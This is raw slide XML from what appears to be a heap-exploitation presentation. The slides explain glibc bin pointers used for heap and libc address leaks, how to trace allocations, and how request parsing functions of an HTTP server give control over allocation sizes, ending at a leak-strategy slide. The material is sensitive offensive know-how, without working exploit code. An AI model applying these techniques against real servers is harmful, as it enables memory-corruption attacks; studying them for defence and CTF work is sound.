            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operation to perform – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GET, POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path or location of the resource to fetch -	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>file.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Version:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The version of the HTTP protocol to use – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1743396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DDF3-B8C6-8841-868E-E95B8C43DA2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leak Information for Bins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62839FA-ABFF-6546-9AC1-5D0C1A084FD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="6126569" cy="3633112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCache/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fastbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unsorted Bin/Small Bin: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd &amp; Bk used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large Bin: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd, Bk, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fd_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bk_nextsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>leaks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other pointers in the program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Large bin chunk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE541B55-B8BC-5A4F-A4BE-5A681755FFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7038102" y="1079584"/>
            <a:ext cx="1459283" cy="3633112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1773438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1259F-2D69-794D-951D-75C30E5D4333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760386" y="180965"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracing Allocations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A99335B7-CF5D-0647-A583-CFDB46EDC9E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954115" y="1236541"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Calls to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>Sizes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290" name="Picture 2" descr="Trace the Number. Tracing Number with Christmas Lights. Educational  Children Game Stock Vector - Illustration of christmas, child: 203702953">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D0A874-0EE3-BA48-8199-E8677CD4A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514" y="119561"/>
            <a:ext cx="3479964" cy="3787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s_heap_chunks output">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3DC4B8B-645B-5B4F-8026-A809951431D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="557831" y="2981790"/>
            <a:ext cx="4473562" cy="1676633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2082143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39014-BDF3-B342-99D2-D7CE9B70B935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allocation/Freeing Primitives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5A1E91B-2091-9202-A49C-789DC093ED9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="497787446"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="628650" y="1236541"/>
          <a:ext cx="7709438"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2509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2BBD-F30A-AB41-9979-E4E79F8D6694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parse URI Primitives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C7BABC-6FD0-3C40-80DA-5DFCBA7F8023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271220" y="1236540"/>
            <a:ext cx="4611498" cy="3906959"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read_wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Partially controlled size        (0x10, 0x20, 0x40…) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Control AMOUNT of allocations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Force lots of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>frees()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Query parameters in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>parse_uri</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a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Key/Value length is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>allocation size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>by us (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>local_cpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Frees at the END of this call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url_decode</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a:t> similar to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>read_wrapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x40, 0x80…0x400, 0x800, 0x1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Read Wrapper allocation primitive">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADE3D9C-449B-124F-86D4-B07B36972159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773801" y="1003300"/>
            <a:ext cx="4370199" cy="1987917"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB473916-44C4-B9CC-3189-54DAEC05C31E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187947" y="2571750"/>
            <a:ext cx="102687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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91A603C-F0FB-54CE-0189-A9CDBAA1188B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7238890" y="1887241"/>
            <a:ext cx="102687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271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2BBD-F30A-AB41-9979-E4E79F8D6694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>parse_single_header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Primitives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C7BABC-6FD0-3C40-80DA-5DFCBA7F8023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271220" y="1236541"/>
            <a:ext cx="4602997" cy="1335209"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Control EXACT size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>via key length &amp; value length </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="parse_single_header allocations and frees">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8213DFE-E828-1A43-84F4-914AF6E9D1CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="201477" y="2767946"/>
            <a:ext cx="6362055" cy="2278026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A65A80F-C3EA-A34F-87C0-3C9A82FCE908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1236540"/>
            <a:ext cx="4602997" cy="1335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venir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Control the approximate size of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Limited on AMOUNT of free chunks in a bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2"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786573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Leak Strategy</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1"/>
            <a:ext cx="6826772" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>unsorted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>bin for pointers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LibC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and Heap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
